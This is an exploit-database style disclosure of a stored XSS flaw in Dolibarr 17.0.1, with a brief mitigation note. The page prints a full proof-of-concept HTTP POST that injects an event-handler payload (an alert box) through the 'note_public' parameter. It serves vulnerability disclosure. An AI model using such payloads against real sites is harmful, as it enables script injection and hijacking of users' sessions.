Dolibarr Version 17.0.1 - Stored XSS

vendor:

Dolibarr

by:

Furkan Karaarslan

7.5

CVSS

HIGH

Stored XSS

CWE

Product Name: Dolibarr

Affected Version From: 17.0.1

Affected Version To: 17.0.1

Patch Exists: NO

Related CWE:

CPE: dolibarr

Metasploit:

Other Scripts:

Platforms Tested: Windows, Linux

2023

Dolibarr Version 17.0.1 – Stored XSS

This exploit allows an attacker to inject malicious code in the 'note_public' parameter of the Dolibarr application, leading to a stored XSS vulnerability.

Mitigation:

To mitigate this vulnerability, it is recommended to sanitize user input and implement proper output encoding.

Source

Exploit-DB raw data:

# Exploit Title: Dolibarr Version 17.0.1 - Stored XSS
# Dork: 
# Date: 2023-08-09
# Exploit Author: Furkan Karaarslan
# Category : Webapps
# Vendor Homepage: http://127.0.0.1/dolibarr-17.0.1/htdocs/user/note.php
# Version: 17.0.1 (REQUIRED)
# Tested on: Windows/Linux
# CVE : 

-----------------------------------------------------------------------------
Requests

POST /dolibarr-17.0.1/htdocs/user/note.php HTTP/1.1
Host: 127.0.0.1
Content-Length: 599
Cache-Control: max-age=0
sec-ch-ua: 
sec-ch-ua-mobile: ?0
sec-ch-ua-platform: ""
Upgrade-Insecure-Requests: 1
Origin: http://127.0.0.1
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.5735.134 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Sec-Fetch-Site: same-origin
Sec-Fetch-Mode: navigate
Sec-Fetch-User: ?1
Sec-Fetch-Dest: document
Referer: http://127.0.0.1/dolibarr-17.0.1/htdocs/user/note.php?action=editnote_public&token=4b1479ad024e82d298b395bfab9b1916&id=1
Accept-Encoding: gzip, deflate
Accept-Language: tr-TR,tr;q=0.9,en-US;q=0.8,en;q=0.7
Cookie: 5c8ccd93504819395bd9eb83add769eb=g6sujc3ss8cj53cvk84qv0jgol; f758a1cd0925196cd7746824e3df122b=u04rsmdqgrdpr2kduo49gl0rmh; DOLSESSID_18109f368bbc82f2433d1d6c639db71bb97e2bd1=sud22bsu9sbqqc4bgcloki2eht
Connection: close

token=4b1479ad024e82d298b395bfab9b1916&action=setnote_public&token=4b1479ad024e82d298b395bfab9b1916&id=1&note_public=%3Ca+onscrollend%3Dalert%281%29+style%3D%22display%3Ablock%3Boverflow%3Aauto%3Bborder%3A1px+dashed%3Bwidth%3A500px%3Bheight%3A100px%3B%22%3E%3Cbr%3E%3Cbr%3E%3Cbr%3E%3Cbr%3E%3Cbr%3E%3Cbr%3E%3Cbr%3E%3Cbr%3E%3Cbr%3E%3Cbr%3E%3Cbr%3E%3Cbr%3E%3Cbr%3E%3Cbr%3E%3Cbr%3E%3Cbr%3E%3Cbr%3E%3Cbr%3E%3Cbr%3E%3Cbr%3E%3Cbr%3E%3Cbr%3E%3Cbr%3E%3Cbr%3E%3Cbr%3E%3Cbr%3E%3Cbr%3E%3Cbr%3E%3Cbr%3E%3Cbr%3E%3Cbr%3E%3Cbr%3E%3Cbr%3E%3Cbr%3E%3Cspan+id%3Dx%3Etest%3C%2Fspan%3E%3C%2Fa%3E&modify=De%C4%9Fi%C5%9Ftir